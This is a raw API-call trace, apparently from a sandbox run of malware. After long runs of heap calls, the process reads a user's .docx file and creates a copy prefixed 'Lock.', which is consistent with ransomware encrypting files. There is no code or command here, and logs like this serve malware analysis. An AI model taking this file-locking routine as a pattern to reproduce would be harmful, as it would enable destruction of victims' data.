Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.950] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0263.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MkMwkg_ip2 n-V.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mkmwkg_ip2 n-v.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0263.956] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0263.956] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0263.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0263.956] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.956] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.956] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0263.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0263.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.MkMwkg_ip2 n-V.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.mkmwkg_ip2 n-v.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0263.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0263.957] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0263.957] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0263.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0263.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0263.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.958] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0263.958] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0263.961] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x42e4, lpOverlapped=0x0) returned 1 [0263.962] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0263.963] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x142e4) returned 0x24b7a48 [0263.963] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.963] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0263.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.963] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0263.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0263.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x142e4) returned 0x24b7a48 [0263.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x142e4) returned 0x34b2250 [0263.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0263.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0263.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0263.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.968] 